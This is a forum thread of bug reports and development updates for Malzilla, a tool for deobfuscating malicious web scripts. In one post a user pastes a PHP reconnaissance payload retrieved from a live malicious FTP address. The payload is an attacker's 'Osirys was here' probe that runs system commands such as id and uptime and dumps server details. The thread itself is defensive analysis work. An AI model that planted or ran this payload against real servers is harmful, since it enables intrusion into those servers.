MalZilla

[tjs]

Another odd bug with v1.0. Right click-exit from the system tray causes Malzilla to return an empty dialog box and fail to exit.

Malzilla
-------
(X)
[ok]

TJS

[tjs]

Actually, I don't know what I did-- but malzilla refuses to exit altogether! Anywhere I go to try to exit causes this dialog box. Going to have to terminate it the 'fun' way (process explorer)

[bobby]

I have reproduced the AccessViolation that JohnC and MysteryFCM got. I'm working on it.
If it is a kind of excuse, it is not my fault. It is a fault of the code behind the SynMemo component that I use in Malzilla.

[JohnC]

On some sites when you click send script to decoder, it might not highlight and send the script, or it might only send one. As an example, this will send the top script but if you click it again it doesn't send the second script and if you click it again it doesn't send the third. But if you click it again (there are only 3 scripts) it will go back to the beginning and highlight/send the first script like it should.

http://www.google.co.uk/

Also, if you click Run Script on decoders tab when there is no script, it will say script compiled, but the run script and debug button will turn grey like it is busy. So you cannot use it, until you close malzilla and re-open it.

[bobby]

I've just fixed the problem with finding scripts and with disabled buttons.
I've also fixed AccessViolations.
Only remaining problem is if the decoding get stuck, I can't do anything like Cancel button.

[bobby]

Please download this build from here:
http://malzilla.sourceforge.net/builds/

[Orac]

Just downloaded the latest one, which appears may have a ftp problem. I was unable to reterive the script from this link, ftp://216.12.192.109/ids.txt

The script at the link was then reterived using the first malzilla version incorporating ftp.

[bobby]

Works fine here. Can you test with WGET or with older version of Malzilla again?
Maybe is a temporary server glitch or something like that.

[MysteryFCM]

Prolly just a server glitch ..... script was snagged without issue here

Code: [Select]

<?php
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }
   
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
                           
}

echo "Osirys<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "Osirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

[Orac]

Just tried grabbing it with the new version, this time it worked fine.

Must have been a server burp.

[JohnC]

Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.

[bobby]

Please can HTTP headers that are returned also be stored in the cache, so if we need to open a cached page, we see what headers were returned.

I'm giving my best to do something about that script that uses HTML elements (where you also need these cookies).
I got one week free from the job (there is no job for me next week in the company), so I hope I'll get these new issues with obfuscation solved (incl. caching the cookies).

[bobby]

Implemented extended cache (cookies inclusive).
Partial working solution for the LuckySploit (the one with HTML elements and cookie).
Shellcode analyzer based on libemu is already implemented (you can analyze these WMF, ANI, PDF etc. exploits now).
As soon as I get some more free time, I'll finish LuckySploit deobfuscation and I'll push a release.
Malzilla's site would also need some updating

[MysteryFCM]

Looking forward to it dude

[JohnC]

Keep up the good work